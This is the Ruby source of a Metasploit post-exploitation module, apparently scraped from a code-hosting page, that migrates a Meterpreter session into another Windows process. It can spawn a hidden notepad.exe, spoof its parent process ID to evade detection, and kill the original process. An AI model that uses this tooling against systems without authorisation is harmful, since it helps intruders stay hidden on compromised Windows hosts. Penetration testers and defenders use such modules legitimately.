Path: blob/master/modules/post/windows/manage/migrate.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Common7include Msf::Post::Windows::Process89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Windows Manage Process Migration',14'Description' => %q{15This module will migrate a Meterpreter session from one process16to another. A given process PID to migrate to or the module can spawn one and17migrate to that newly spawned process.18},19'License' => MSF_LICENSE,20'Author' => [21'Carlos Perez <carlos_perez[at]darkoperator.com>',22'phra <https://iwantmore.pizza>'23],24'Platform' => [ 'win' ],25'SessionTypes' => [ 'meterpreter' ],26'Compat' => {27'Meterpreter' => {28'Commands' => %w[29core_migrate30stdapi_sys_config_getenv31stdapi_sys_process_attach32stdapi_sys_process_execute33stdapi_sys_process_kill34]35}36},37'Notes' => {38'Stability' => [CRASH_SERVICE_DOWN],39'SideEffects' => [CONFIG_CHANGES],40'Reliability' => []41}42)43)4445register_options(46[47OptBool.new('SPAWN', [false, 'Spawn process to migrate to. If set, notepad.exe is used.', true]),48OptInt.new('PID', [false, 'PID of process to migrate to.', 0]),49OptInt.new('PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).', 0]),50OptString.new('PPID_NAME', [false, 'Name of process for PPID spoofing when creating a new process.']),51OptString.new('NAME', [false, 'Name of process to migrate to.']),52OptBool.new('KILL', [false, 'Kill original process for the session.', false])53]54)55end5657def run58hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']59print_status("Running module against #{hostname} (#{session.session_host})")6061server = session.sys.process.open62original_pid = server.pid63print_status("Current server process: #{server.name} (#{server.pid})")6465target_pid = nil6667if datastore['SPAWN'] && (datastore['SPAWN'] != '')68target_pid = create_temp_proc69elsif datastore['PID'] && (datastore['PID'] != 0)70target_pid = datastore['PID']71elsif datastore['NAME'] && (datastore['NAME'] != '')72target_pid = session.sys.process[datastore['NAME']]73end7475if !target_pid || !has_pid?(target_pid)76print_error("Process #{target_pid} not found")77return78end7980begin81print_status("Migrating into #{target_pid}")82session.core.migrate(target_pid)83print_good("Successfully migrated into process #{target_pid}")84rescue StandardError => e85print_error('Could not migrate into process')86print_error("Exception: #{e.class} : #{e}")87end8889if datastore['KILL']90print_status("Killing original process with PID #{original_pid}")91if has_pid?(original_pid)92session.sys.process.kill(original_pid)93print_good("Successfully killed process with PID #{original_pid}")94else95print_warning("PID #{original_pid} exited on its own")96end97end98end99100# Creates a temp notepad.exe to migrate to depending the architecture.101def create_temp_proc102target_ppid = session.sys.process[datastore['PPID_NAME']] || datastore['PPID']103cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)104105print_status('Spawning notepad.exe process to migrate into')106107if (target_ppid != 0) && !has_pid?(target_ppid)108print_error("Process #{target_ppid} not found")109return110end111112if has_pid?(target_ppid)113print_status("Spoofing PPID #{target_ppid}")114end115116# run hidden117proc = session.sys.process.execute(cmd, nil, {118'Hidden' => true,119'ParentPid' => target_ppid120})121122return proc.pid123end124end125126127